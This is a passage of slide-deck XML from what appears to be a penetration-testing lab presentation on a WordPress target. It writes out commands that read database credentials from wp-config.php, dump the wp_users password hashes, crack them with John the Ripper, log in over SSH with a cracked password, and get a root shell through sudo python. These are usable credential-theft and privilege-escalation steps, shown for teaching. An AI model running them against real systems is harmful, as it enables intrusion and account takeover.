              <a:t>Same exploit used to get flag1 and flag2.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What did the exploit achieve?</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Accessing MySQL database and capturing Flag 3. Access to database was gained through the wp-config.php file by using Michael's credentials. Flag 3 was found in wp_posts table in the wordpress database.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669800" y="6943950"/>
            <a:ext cx="10213800" cy="3504600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC0000"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="2286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2500" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Commands used:</a:t>
            </a:r>
            <a:endParaRPr sz="2500" b="1">
              <a:solidFill>
                <a:schemeClr val="lt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en-US" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>cd /var/www/html/wordpress/wp-admin cd /*</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500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>mysql -u root -p ’R@v3nSecurity’ -h 127.0.0.1</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500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>show databases;</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500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>use wordpress;</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2500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>show tables;</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select * from wp_posts;</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="222" name="Google Shape;222;p2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2141775" y="9961999"/>
            <a:ext cx="11438401" cy="3104808"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="22860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1"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22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8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21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19"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21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fade">
                                      <p:cBhvr>
                                        <p:cTn id="23"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Exploitation: Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr sz="7000">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228" name="Google Shape;228;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12</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="Google Shape;229;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="41985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0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How did we exploit the vulnerability?</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unsalted password hash and the use of privilege escalation with Python.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What did the exploit achieve?</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We were able to retrieve user credentials from mysql database, crack the password hashes with john the ripper, and used Python to gain root privileges. The usernames and password hashes were saved to Kali machine in a file wp_hashes.txt</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Google Shape;230;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676900" y="6869800"/>
            <a:ext cx="6791400" cy="4198500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC0000"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="257175"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500" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Commands used:</a:t>
            </a:r>
            <a:endParaRPr sz="2500" b="1">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>mysql -u root -p’R@v3nSecurity’ -h 127.0.0.1</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show databases;</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use wordpress;</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show tables;</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select * from wp_users;</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="231" name="Google Shape;231;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3" cstate="print">
            <a:alphaModFix/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="1710"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9068200" y="6869800"/>
            <a:ext cx="14427900" cy="4198425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="257175" dist="571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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22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0"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="23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fade">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="10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0"/>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Exploitation: Unsalted User Password Hash  </a:t>
            </a:r>
            <a:endParaRPr sz="7000">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Google Shape;238;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13</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="239" name="Google Shape;239;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1903675" y="5955625"/>
            <a:ext cx="12523300" cy="5431800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="314325" dist="104775" dir="5340000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240" name="Google Shape;240;p30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="28572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0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password hash with John the Ripper </a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>On the Kali machine wp_hashes.txt was run against john the ripper on Kali machine to crack hashes. john wp_hashes.txt /usr/share/wordlists/rockyou.txt</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command: john --show wp_hashes.txt</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="241" name="Google Shape;241;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="14770250" y="7365100"/>
            <a:ext cx="9129200" cy="2612850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="314325" dist="104775" dir="5340000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="3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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24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9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="23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41"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="15"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Exploitation: Privilege Escalation </a:t>
            </a:r>
            <a:endParaRPr sz="7000">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="248" name="Google Shape;248;p31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4630775" y="3849938"/>
            <a:ext cx="9967800" cy="3636000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="243750" rIns="1219000" bIns="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="2050">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="5800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="249" name="Google Shape;249;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14</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="250" name="Google Shape;250;p3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2502525" y="6784050"/>
            <a:ext cx="9967799" cy="6300100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="328613" dist="47625" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="251" name="Google Shape;251;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4" cstate="print">
            <a:alphaModFix/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="14748"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2023100" y="4890700"/>
            <a:ext cx="8197876" cy="8193450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="328613" dist="47625" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="Google Shape;252;p31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="12487800" cy="25953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0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How did we exploit the vulnerability?</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Once the Steven’s password hash was cracked, we SSH as Steven and escalated to root to capture Flag 4.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="Google Shape;253;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12359650" y="2295400"/>
            <a:ext cx="9967800" cy="4182000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC0000"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="257175"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500" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Commands:</a:t>
            </a:r>
            <a:endParaRPr sz="2500" b="1">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ssh steven@192.168.1.110</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pw:pink84</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sudo -l</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sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’</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cd /root</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ls</a:t>
            </a:r>
            <a:endParaRPr sz="25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r>
              <a:rPr lang="en-US" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>cat flag4.txt</a:t>
            </a:r>
            <a:endParaRPr sz="2500">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3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25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fade">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25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fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="10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3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24377650" cy="13716000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260" name="Google Shape;260;p32"/>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p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261" name="Google Shape;261;p32"/>
          <p:cNvSpPr txBox="1">
